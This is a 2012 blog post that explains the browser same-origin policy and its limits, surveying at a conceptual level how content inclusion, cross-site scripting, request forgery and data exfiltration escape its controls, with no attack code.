On the web, every other day we see a new JavaScript library, a new framework, a browser hack or an innovative way of using/bypassing some feature for building something good. Most of us are so deeply involved in learning, constructing new things that we almost forgot, failed to care or understand that the core of web platform is beyond our control. The situation is not that bad that someone can hack your site immediately irrespective of your defense mechanisms (as hyped by a few ‘so-called security experts’ and tech magazines), but for sure, there are a lot of loopholes in place by design, which security ninjas understand well. As Paul Irish (Google Chrome Developer Evangelist) points out in his blog, in the recent years, academic researchers have been concentrating on enhancing the web platform and browser security is gaining a lot of traction.
The goal of this post is to point out some of the gray areas in the web platform and how browser security is shaping up (some of you might already know these in pieces). The post is intended to bring security focus to web developers so that it enables them to understand cutting edge research going in this area. As a part of my M.S by research thesis, I am lucky enough to survey and study the state-of-the-art research going in this area.
JavaScript and access control
Web developers, specifically lovers of JavaScript (JS) know very well about it’s ‘bad’ parts along with its magical powers. Leaving the bad parts and security of JavaScript language aside, the other issue related to JavaScript security is, what access privileges can a script running in a web page can have? There two main security features which restrict the damage JS can do in a browser are – Sandbox and Same-Origin-Policy (SOP).
Sandbox makes sure that JS in browser does not have access to the underlying file system (Imagine a malicious script which made way into your webpage deleting your files!). It is due to the restrictions of sandbox that one cannot do file I/O operations using JavaScript.
Same-Origin-Policy:To understand and define SOP better, one needs to understand the term “Origin”.
Origin: The combination of “scheme://host: port” is called the “Origin” of a website. Scheme stands for protocols like http, https etc. Host stands for domain name such as example.com. Port is the port number on which the protocol is running. For http, the default port is 80 and is not included in notations.
As per the above definition, http://example.com is called an origin. Note that http://example.com/profile/kris.php (dummy link) is called a URL whose origin is http://example.com.
For all major security decisions inside the browser, “origin” is considered as a basic unit which provides isolation. Thus JavaScript’s access control (even in HTML5) is defined in terms of access to origins.
Same and cross origin interactions
Same-Origin-Policy controls the interactions that can happen between origins. Interactions like read/write/execute on “resources” are granted access within an origin whereas restrictions are put across origins. The below table shows clearly what are same and cross origins.
Note that the sub-domains mail.example.com and chat.example.com are treated as different origins though they have the same parent domain. This restriction can be put off by a feature called “domain relaxation”. By setting document.domain property to “example.com”, both the sub-domains can reduce the origin check to “example.com” instead. There are a lot of intricacies of course, which I do not want to cover here.
Note: Michal Zalewski’s book “The Tangled Web” best explains in detail, the intricacies of origins and browser security. My understanding of web security has multiplied after reading this book. Also, the core concepts in this post are compiled from some of its chapters. Suggest you to read the book for increasing your depth.
So the interactions between sites whose origin do not match are known as cross-origin interactions while between those that match are called same origin interactions. These interactions vary between various resources of the site. Here, the term “resources” refer to DOM (Document Object Model), Cookies, XMLHTTPRequest (AJAX), HTML5 Local storage etc. In general, SOP can be stated as - Within an origin, all scripts have equal and complete access to DOM, storage and network, whereas across origins, they cannot. It is observed that the implementation of Same-Origin-Policy in various browsers varies with the resource in consideration.
Now that you have understood what same origin and cross origin interactions are, try to answer the below questions yourself. To set the context, let A.com and B.com be websites from two different origins. Let A and B be the the content of the sites A.com and B.com respectively, rendered by browsers. Now,
- Can A get resources (images/css/scripts) from B.com?
- Can A execute resources (scripts) from B.com?
- Can A post content to B.com?
- Can A interfere with the DOM of B?
- Can A redirect a browsing context (iframe, window etc) of B?
- Can A read storage (cookies, localStorage etc) of B?
- Can chat.A.com communicate (exchange data) with A.com?
- Can A.com/user1 read/fetch content of A.com/user2?
Though these questions look trivial, they bear a lot of concepts behind. I have written several blog posts related to the above questions in this year (2012). Check these: JSONP and Cross-Origin AJAX, AJAX vs. HTML5 CORS, HTML5 Sandbox, The need for HTML5 PostMessage, Frame Navigation Policies.
Why is the web “Uncontrollable”?
Though Same-Origin-Policy enforces certain restrictions on the way script interact, it has several bypasses and is not sufficient to meet complex security requirements (e.g., mashups are the best example). Below are some of the cases which are beyond the control of SOP.
Content Inclusion:
All HTML elements which make HTTP GET requests can be loaded from any origin. Ex: <img src=””>, <link href=””>, <script src=””>. SOP does not put any restrictions such as preventing cross origin inclusions. For the past several years, this has been a security concern since browsers do not do anything when it comes to inflow of content. Also, nothing stops an image tag from downloading a script. As Douglas Crockford, JavaScript guru, rightly points, “SOP does not apply to scripts themselves”.
Moreover, when it comes to scripts, there is recursion involved in some sense. i.e., a script can in turn create another script tag in the DOM and load a remote script. So if a script “X” is trust worthy, it does not imply that the other scripts “Y” and “Z” loaded by “X” are trust worthy. Trust is not transitive and cannot be verified in this model.
Cross-Site Scripting (XSS):
As most of us know, XSS is a technique in which attackers use flaws in web applications to inject evil code. Typically, code injection happens due to lack of (or) weak sanitization of inputs, either before storing into database or before rendering into the DOM. Based on the way XSS is triggered, it is classified into Stored, Reflected and DOM XSS. OWASP.org has detailed information on XSS along with a few detection and prevention techniques.
The point here is, once a script is injected, it has equal and complete privileges as other genuine scripts in that origin. So DOM access, network access and storage access is compromised. SOP does not have anything to say about XSS, which is a major problem.
Cross-Site Request Forgery (CSRF):
In this well known attack, the attacker masquerades as a genuine user and submits HTTP requests to the server. The server assumes the request is from a genuine user and executes it. A simple image tag can be used to send cross origin GET requests, thereby forging the genuine user. (Check OWASP.org for more info). SOP does not have any restrictions on out-going requests or a mechanism to identify genuine/malicious requests and hence fails to prevent CSRF.
Data-Exfiltration
Data can be sent out to cross-origins using several techniques. Apart from image, script, link tags which can do cross origin GET requests, HTML forms can do cross-origin POSTs, because of which sensitive data can be exported to evil destinations. There are several hacks which can export data (out of scope of this topic) and the main problem here is lack of check on out-going data. SOP does not have a mechanism to check data-exfiltration, which is also a major concern.
Conclusion
In principle, data can be pulled in and sent out via several channels without any security checks by browsers (Authentication and authorization come under application logic at the server, not on the client). Due to these main factors, the state of the current web is uncontrollable. To fix these problems, security researchers are focusing on designing stricter browser security policies, which address the limitations of SOP. The main challenge here is, web has already grown into a huge tree and any drastic change will break it completely. Backward compatibility with respect to supporting older browsers, older languages, developers who are not ready to migrate etc. are a part of this grand challenge. However, the work of several smart researchers is beginning to pay with smarter and stricter policies coming into picture. I shall discuss them in my upcoming posts. Stay tuned 
Tags: web security, JavaScript, HTML5, browsers